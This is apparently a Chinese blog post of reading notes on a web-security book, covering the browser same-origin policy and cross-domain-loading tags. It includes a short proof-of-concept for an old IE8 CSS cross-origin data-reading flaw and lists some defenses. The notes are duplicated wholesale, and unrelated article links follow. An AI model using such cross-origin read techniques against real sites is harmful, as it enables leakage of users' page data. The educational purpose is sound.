读书笔记----白帽子讲web安全--2015-11-27
2015-11-27 10:18
253 查看
一,浏览器的同源策略
1.为网站安全性考虑,是浏览器最基本的安全策略;限制俩只不同源的document脚本对当前的document脚本读取或设置某些属性
2. 但是在浏览器中,某些标签是可以跨域加载资源:<script>.,<img><iframe><link>,利用这些标签加载其他未知文件会导致网站陷入不安全中
3. xmlhttprequest收到同源策略的约束,不能跨域访问资源。
4. ie8 css的跨域漏洞:http://www.2cto.com/Article/201009/73046.html
example:
POC:
www.a.com/test.html:
<body>
{}body{fontFamily:
aaaaaaaaaaaaaa
bbbbbbbbbbbbbbbb
</body>
www.b.com/test2.html:
<style>
@import url("http://www.a.com/test.html");
</style>
<script>
setTimeout(function(){
var t = document.body.currentStyle.fontFamily;
alert(t);
},2000);
</script>
5.防护措施:浏览器的沙箱模式;恶意网址拦截;EV证书
二:html5的canvas标签可以解析图片验证码
1.为网站安全性考虑,是浏览器最基本的安全策略;限制俩只不同源的document脚本对当前的document脚本读取或设置某些属性
2. 但是在浏览器中,某些标签是可以跨域加载资源:<script>.,<img><iframe><link>,利用这些标签加载其他未知文件会导致网站陷入不安全中
3. xmlhttprequest收到同源策略的约束,不能跨域访问资源。
4. ie8 css的跨域漏洞:http://www.2cto.com/Article/201009/73046.html
example:
POC:
www.a.com/test.html:
<body>
{}body{fontFamily:
aaaaaaaaaaaaaa
bbbbbbbbbbbbbbbb
</body>
www.b.com/test2.html:
<style>
@import url("http://www.a.com/test.html");
</style>
<script>
setTimeout(function(){
var t = document.body.currentStyle.fontFamily;
alert(t);
},2000);
</script>
5.防护措施:浏览器的沙箱模式;恶意网址拦截;EV证书
二:html5的canvas标签可以解析图片验证码
相关文章推荐
- jquery图片轮播
- android5.1 AlarmManagerService的学习总结(未完)
- java 11-27
- php中curl_multi的应用
- 利用socket发送邮件
- 《使用云计算和大数据进行性能测试》
- .xyz域名总量TOP14:西数连续夺冠 新网降至第五
- sas14位日期数字字符串转sas日期
- opencv imread imwrite "Unhandled exception in ***.exe(msvcr100d.dll):OxC0000005"
- [SharePoint 2010] 如何在小組網站內頁面上撥放影片或是音效檔
- SSH:Hibernate框架(简介)
- INNODB整体讲解
- 查看Tomcat版本
- C#中值类型和引用类型的区别
- [SharePoint 2010] 如何安裝啟用多國語系支援的SharePoint網站
- 万恶的假疫苗
- 人生仅有的自由
- hadoop之shuffle
- C#实现Winform鼠标拖动窗口大小时设定窗口最小尺寸的方法
- O2O中客户主数据、数据仓库和大数据